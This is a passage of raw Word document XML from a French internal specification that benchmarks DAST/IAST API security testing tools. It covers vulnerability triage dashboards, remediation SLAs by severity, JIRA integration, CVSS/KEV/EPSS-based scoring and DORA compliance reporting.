            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      LOW:      P4 - Mineur</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    labels:      ['security', 'dast-iast', '{environment}']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    component:   '{gitlab_project_name}'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  auto_create:  true    # création auto si CRITICAL ou HIGH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  auto_close:   true    # fermeture auto si finding Fixed</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12.5   Suivi des corrections par projet /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Fonctionnalité</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Niveau exigence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SLA de correction par criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>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CRITICAL : 7 jours, HIGH : 30 jours, MEDIUM : 90 jours, LOW : 180 jours. Alertes à J-3 et J-dépassement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Tableau de bord SLA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Vue par équipe/application du respect des SLA. % dans les délais. Top violateurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Historique de correction</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pour chaque vuln corrigée : date détection, date correction, durée de remédiation, commit de fix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Métriques de régression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Nombre de vulnérabilités réintroduites après correction. Taux de récurrence par type.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Vue comparative multi-versions</w:t>
            </w:r>
          </w:p>
        </w:tc>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Évolution du score de sécurité entre les versions/releases de l'application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Export rapport de conformité</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Rapport PDF/Excel listant les vulnérabilités par application avec statut SLA pour audit DORA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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bl>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12.6   Criticité et scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.6.1   Criticité DAST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Basée sur CVSS v3.1 : score calculé à partir du vecteur d'attaque, complexité, privilèges requis, impact (C/I/A)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enrichissement contextuel : une vuln MEDIUM sur une API FCI est remontée en HIGH (facteur multiplicateur configurable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">KEV (Known Exploited Vulnerabilities — CISA) : flag automatique si la vuln correspond à une CVE dans le catalogue KEV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EPSS (Exploit Prediction Scoring System) : probabilité d'exploitation dans les 30 prochains jours — affiché sur chaque finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.6.2   Criticité IAST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Criticité basée sur la confiance du taint tracking : HIGH confidence (source → sink sans sanitizer) = CRITICAL ; MEDIUM confidence (sanitizer partiel détecté) = HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Contexte d'exécution : la même vuln détectée dans un test d'intégration sur un endpoint public est plus critique que dans un test unitaire sur une méthode interne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrélation avec la couverture de test : si le chemin d'exécution vulnérable n'est parcouru que partiellement par les tests, la confiance est abaissée et signalée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">12.7   Tableau de synthèse des exigences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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2426"/>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Fonctionnalité</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Niveau</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EF-D01</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Vue consolidée multi-projets avec KPI sécurité</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EF-D02</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Score de sécurité par application (CVSS-based)</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EF-D03</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Workflow triage (Open/Confirmed/FP/Accepted/Fixed)</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EF-D04</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Requalification FP avec justification obligatoire</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EF-D05</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Commentaires et collaboration par finding</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EF-D06</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Intégration JIRA (création + lien bidirectionnel)</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EF-D07</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SLA de correction par criticité avec alertes</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EF-D08</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Historique et métriques de correction</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EF-D09</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Rapport différentiel (nouveaux findings uniquement)</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EF-D10</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Export conformité DORA (PDF/Excel)</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EF-D11</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Enrichissement KEV + EPSS</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Partiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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EF-D12</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Intégration Teams/Slack notifications</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F4F24"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommandé</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EF-D13</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Vue conformité RTS DORA (APIs FCI)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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</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EF-D14</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API REST dashboard (consommable par VOC externe)</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12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Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2426"/>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Obligatoire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jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="444444"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Document à usage interne – Classification C2 Restreint – PSC26 – DEB_SécuAPI – Mai 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666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">DEB_SécuAPI – PSC26 – Mai 2026 – Document intégral v3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8"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PSC26 – Contrôles Sécurité APIs  |  Benchmark DAST/IAST – Document Complet</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="CC0000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  C2 Restreint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2026-05-12T07:53:25.904Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-12T07:53:25.905Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>